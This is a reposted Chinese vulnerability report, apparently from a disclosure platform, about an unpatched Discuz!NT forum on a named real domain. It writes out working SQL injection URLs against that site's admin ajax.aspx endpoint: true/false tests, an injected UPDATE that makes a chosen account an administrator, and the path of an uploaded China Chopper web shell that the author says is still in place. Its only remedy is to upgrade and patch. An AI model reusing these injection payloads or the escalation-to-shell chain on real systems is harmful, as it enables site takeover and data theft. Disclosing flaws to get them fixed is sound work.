来源:自学PHP网 时间:2015-04-17 14:11 作者: 阅读:次
[导读] 发现了论坛居然是dnt,还是旧的版本,最重要的是,没打补丁。。。相关说明:http://nt.discuz.net/showtopic-135589.htmlhttp://xyj.kugou.com/bbs/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascxposter=1#3......
发现了论坛居然是dnt,还是旧的版本,最重要的是,没打补丁。。。
相关说明: http://nt.discuz.net/showtopic-135589.html http://xyj.kugou.com/bbs/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1') or 1=1-- http://xyj.kugou.com/bbs/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1') or 1=2-- 提升为管理员 http://xyj.kugou.com/bbs/admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1');update kg_users set groupid=1 where username='aaaaaaabc2010'-- 进入后台,拿shell http://xyj.kugou.com/bbs/tools/1.aspx chopper shell 还没删除,你们来删吧。。。也是到拿shell为止,什么也没做。 漏洞证明: 修复方案: 升级打补丁 作者 Jannock |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com